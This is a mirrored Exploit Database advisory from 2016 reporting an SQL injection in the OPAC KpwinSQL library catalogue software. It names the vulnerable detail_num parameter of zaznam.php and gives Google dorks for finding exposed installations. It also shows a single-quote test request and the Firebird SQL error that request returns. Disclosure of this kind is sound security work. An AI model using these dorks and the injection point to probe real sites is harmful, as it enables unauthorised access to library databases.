OPAC KpwinSQL – SQL Injection

• Exploit Database
• 15 阅读

• 作者： bRpsd
  日期： 2016-06-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40013/

• @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  
  Product -> OPAC KpwinSQL - SQL Injection
  Date -> 6/24/2016
  Author -> bRpsd
  Skype: vegnox
  Vendor HomePage -> http://www.kpsys.cz/
  Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
  Product Version -> / All
  SQL Version -> Firebird 1.5.3 
  OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
  
  
  Dork -> intitle:"WWW OPAC KpwinSQL"
  Dork2 -> inurl:zaznam.php?detail_num=
  Dork3 -> inurl:opacsql2_0
  
  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  
  
  File: zanzam.php
  Parameter: detail_num
  
  
  
  Test > http://localhost:8888/zaznam.php?detail_num=1'
  
  
  Response:
  
  24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...